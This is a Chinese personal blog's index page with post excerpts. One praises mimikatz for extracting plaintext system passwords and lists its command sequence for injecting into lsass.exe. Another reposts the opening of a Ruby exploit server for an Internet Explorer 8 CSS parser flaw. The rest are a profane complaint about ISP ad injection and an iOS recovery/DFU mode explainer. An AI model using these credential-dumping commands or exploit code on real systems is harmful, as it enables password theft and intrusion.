杀毒安全『AntiVirus』

mimikatz_trunk

没有评论

可以获取系统密码明文的神器,今天在看雪看到这个东西。文章内容就不转了,原文请参考这里

获取密码的命令序列:

privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswords

猛击此处下载该神器! 作者Blog

博客相关『Blogger/WordPress』

劫持你妈啊,劫持,你妈逼的中国电信

2 条评论

昨天下午的时候忽然发现在访问blog的时候竟然在状态栏出现了链接cnzz、51la以及淘宝的链接提示,话说自己现在已经不用国内的统计了,怎么tmb的还有链接提示,更不用说淘宝的广告了。而观察了一下页面发现右边出现了这么一个2b东西,114,并且页面做的和我原来的那个窗口大小整合式,不知道的可能还以为我是的内嵌广告呢!

这一招够狠啊,能和我的边栏小工具做的一样,真牛b。然而更牛逼的还不是这里,等我想要看下那个牛b的网页的加载地址的和嵌入网页代码的时候刷新了一下竟然发现没了,我操。你妈逼的果然是老流氓啊,干了就跑,跑的比兔子还快。今天下午又看到那个2b东西了,但是发现位置又到了这个空间的上面的一个小工具里。

Continue Reading

经验总结『Skills Summary』

iOS设备 恢复模式和DFU模式的区别【翻译】

没有评论

恢复模式和DFU模式最大的不同在于是否启动了iBoot。在恢复模式下系统使用iBoot来进行固件的回复和升级,而在DFU模式下系统则不会启动iBoot,因而你可以在DFU模式下进行固件的降级。iBoot是iOS设备上的启动加载器,当你在回复模式下进行系统恢复或者升级的时候,iBoot会检测你要升级的固件版本,以确保你要升级的固件版本比当前系统的固件版本要新(版本号更高)。如果要升级的固件版本比系统当前安装的固件版本要低的话,iBoot将会禁止附件的恢复。因为这个原因所以要进行固件的降级则必须要将设备切换到DFU模式下。这也就意味着如果你需要恢复当前的固件版本,只需要将设备切换到恢复模式即可,iTunes会接管接下来的恢复工作;如果你需要将固件进行降级,你需要进入到DFU模式下。比如,在没有进入DFU模式的情况下,你不能将你的固件从3.0降级到2.2.1.

恢复模式:恢复模式是设备在常规的恢复或者升级的时候正常启动iBoot下的一种状态。由于在恢复模式下iBoot是正常启动的,因而它不允许你降级你设备上的固件。并且,除非iBoot被破解,否则它不允许安装自定义的固件。

Continue Reading

入侵渗透『Expliot/Injection』

Internet Explorer 8 CSS Parser Exploit Code

没有评论 
#!/usr/bin/env ruby 
  
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ 
# Author: Nephi Johnson (d0c_s4vage) 
  
require 'socket'
   
def http_send(sock, data, opts={}) 
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html"} 
    opts = defaults.merge(opts) 
      
    code = opts[:code] 
    message = opts[:message] 
    type = opts[:type] 
      
    to_send = "HTTP/1.1 #{code} #{message}\r\n" + 
              "Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" + 
              "Cache-Control: no-cache\r\n" + 
              "Content-Type: #{type}\r\n" + 
              "Pragma: no-cache\r\n" + 
              "Content-Length: #{data.length}\r\n\r\n" + 
              "#{data}"
    puts "[+] Sending:"
    to_send.split("\n").each do |line| 
        puts "    #{line}"
    end
    sock.write(to_send) rescue return false
    return true
end
   
def sock_read(sock, out_str, timeout=5) 
    begin
        if Kernel.select([sock],[],[],timeout) 
            out_str.replace(sock.recv(1024)) 
            puts "[+] Received:"
            out_str.split("\n").each do |line| 
                puts "    #{line}"
            end
        else
            sock.close 
            return false
        end
    rescue Exception => ex 
        return false
    end
end
   
def to_uni(str) 
    res = ""
    str.each_byte do |b| 
        res < < "\x00#{b.chr}"
    end
    res 
end
Continue Reading
Close Menu